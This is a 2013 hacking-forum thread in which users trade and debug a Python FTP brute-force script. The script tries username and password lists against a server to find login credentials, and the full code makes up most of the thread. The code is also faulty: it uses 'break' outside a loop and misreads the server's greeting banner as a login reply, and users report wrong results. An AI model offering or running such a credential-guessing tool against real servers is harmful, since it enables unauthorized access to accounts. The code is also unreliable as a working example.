RE: [Python] FTP Brute 06-26-2013, 10:57 PM
#8
(06-26-2013, 10:33 AM)noize Wrote:(06-26-2013, 10:16 AM)mls577 Wrote:(06-26-2013, 10:06 AM)noize Wrote:Seriously? that didn't happen for me when I just test it. mother fucker. it's late here, I'll look at it tomorrow. try remove code == 220 from the if statement near the end, see if that works.(06-26-2013, 08:44 AM)mls577 Wrote:(06-26-2013, 07:45 AM)noize Wrote: This is a good idea, though, I tested this on my host on port 21 with single user mode (my username) and with a passlist containing 6 words where one was the correct one and it just failed.
sorry about that, I checked my code and found a few errors, they should be fixed now, try the new code.
Well, now I get "login successful!" for any password, lol.
I already tried, but it just says "login failed" like before.
However, take a look at this: http://en.wikipedia.org/wiki/List_of_FTP...turn_codes
220 does not seem to be what you need, you should probably take that away.
P.S: may I suggest editing the code like this:
Code:#mls577 # shoutz to suidrewt and #haxme #ftpbrute is a simple ftp brute force tool I wrote that will take a single username, or a list of usernames from a file and try them #along with a specified password file to do a dictionary attack on an ftp server in order to find login credentials import socket, sys #imports def main(): if(len(sys.argv) < 5): # argument check usage() else: userpass() def usage(): print("FTP Brute by mls577 ") print(" shoutz to #suidrewt and #haxme") print("./ftpbrute.py <host> <port> <user option> <user or user list> <pass list>") print("\nsingle user mode:") print("./ftpbrute.py <host> <port> single <username> <password_file>") print("ex: ./ftpbrute.py <host> <port> single mls577 /home/mls577/pass.txt") print("\nmulti-user and multi-pass: ") print("./ftpbrute.py <host> <port> multi <username_list> <password_list>") print("ex: ./ftpbrute.py <host> <port> multi /home/mls577/user.txt /home/mls577/pass.txt") def userpass(): username_option = sys.argv[3] #user mode password_file = open(sys.argv[5], 'rb') #password file if(username_option == "single"): user = sys.argv[4] user = str.encode(user) for password in password_file: connect(user, password) elif(username_option == "multi"): username_file = open(sys.argv[4], 'rb') for user in username_file: for password in password_file: print(user, password) login = connect(user,password) else: print("wrong user option") def connect(user, password): s = socket.socket() #create socket host = sys.argv[1] #host port = sys.argv[2] #port s.connect((host, int(port))) #makes connection print("\ntrying " + str(user) + " " + str(password)) s.send(b'USER ' + user + b'\r\n') #send username s.send(b'PASS ' + password + b'\r\n') #send password code = s.recv(3) #recieve ftp response code #check ftp response code for successful login, which is normally 230 but I found in some software it was 220 instead if(int(code) == 230): print("login successful!") break else: print("login failed") main()
changelog:
- not showing usage if arguments are valid;
- breaks if login is successful.
I don't want it to break, because I want it to continue trying all the login combinations, even if it has already found one.
whether the usage should be displayed for both is relative, I think it's fine either way. For the life of me, I can't figure out why this won't work. I keep changing and trying different things, but for some god forsaken reason it won't just work. I wrote this nearly a year ago, and thought I got it to work properly, guess not.
about the response codes, I've seen that page and checked to make sure through the rfc: http://tools.ietf.org/html/rfc354 I know 230 is correct but on the ftp server I set up, for some reason it kept sending back 220 as the login successful.
thanks for the help. I'll keep working to figure this out.
A Serious Newbies Guide to the Underground v3
http://www.hackcommunity.com/Thread-A-Se...-v3-Part-1
http://www.hackcommunity.com/Thread-A-Se...-v3-Part-1


![[+]](https://sinister.li/images/modern/collapse_collapsed.png)